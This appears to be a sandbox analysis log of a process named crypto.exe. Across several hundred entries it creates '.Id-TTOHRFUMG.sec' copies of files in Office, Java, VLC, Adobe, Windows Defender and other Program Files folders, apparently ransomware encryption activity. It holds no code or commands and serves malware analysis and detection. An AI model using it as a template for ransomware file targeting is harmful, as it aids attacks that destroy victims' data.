File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\GIFT98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\icon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_left_over.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.AR.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00076_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\settings.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02443_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00668_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\XDPFile_8.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01793_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Cairo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR35B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSTORES.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\RSSFeeds.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.LIC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\sound.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ONINTL.REST.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR33F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14883_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382931.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14565_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\en-US\mpvis.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_matte.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Kuching.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\FLYER.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\sunmscapi.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jdwp.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Rarotonga.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0089945.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18255_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\COIN.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\en-US\WMPSideShowGadget.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Real.mpp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\Install\{5DF2DCA9-BD54-4513-9B32-2C551D72B961}\83.0.4103.106_chrome_installer.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\deploy.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14654_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EXCEL.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0336075.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kiritimati.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185774.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\CNFNOT.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\TexturedBlue.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Australia\Lindeman.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21495_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\Issue Tracking.gta.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSACCESS_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\BlackTieNewsletter.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_foggy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Sao_Paulo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-options.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00444_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\REMOTE.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OUTLACCT.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.lock.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02793_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\cs.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Tell_City.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\JAVA_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ONENOTE_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\text_renderer\libsapi_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libdeinterlace_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099149.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01566_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Executive.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL089.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mset7fr.kic.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\ONLNTCOMLIB.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\16-on-black.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090781.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\RECYCLE.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Midway.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04117_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18230_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR49B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\POSTS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\MpClient.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_hover.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Enderbury.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18236_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSHY7FR.LEX.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD09662_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047x576black.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105272.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SECREC.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\PublicFunctions.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libmotiondetect_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\gl.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\en-US\wmplayer.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00242_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151581.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightYellow.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ACCWIZ\ACWZMAIN.ACCDE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART2.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\ACCSBAR.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WITHCOMP.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\31.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\en-US\Journal.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00390_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSTORE.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21423_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00265_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01772_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\REPORTS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libyuy2_i422_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME19.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\BTINTERNET.NET.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\CET.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Wordcnv.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\OFFISUPP.HTM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-processthreads-l1-1-1.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\spu\libmarq_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\Tulip.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0235241.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libsvcdsub_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\ImportUse.vdw.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsHomePageScript.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Foundry.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.MX.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libspatialaudio_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_es.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14769_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\rtstreamsink.ax.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18210_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PSRCHPHN.DAT.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\calendar.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21301_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00175_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HTECH_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_08.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00256_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00110_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PULLQUOTEBB.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\bdcmetadata.xsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hong_Kong.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Oral.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153089.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows NT\TableTextService\TableTextService.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Berlin.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WINWORD_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKREQ.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libx264_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\uk.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\excelcnvpxy.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\plugin.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD20013_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\IMAGE.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\librtp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Media Renderer\RenderingControl.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\10.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Chicago.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\FAX\EquityFax.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\OptimizeRemove.jtx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Defender\MpSvc.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\swiftshader\libGLESv2.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\30.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18231_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDRESTS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2ssv.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187851.WMF.Id-TTOHRFUMG.sec	crypto.exe
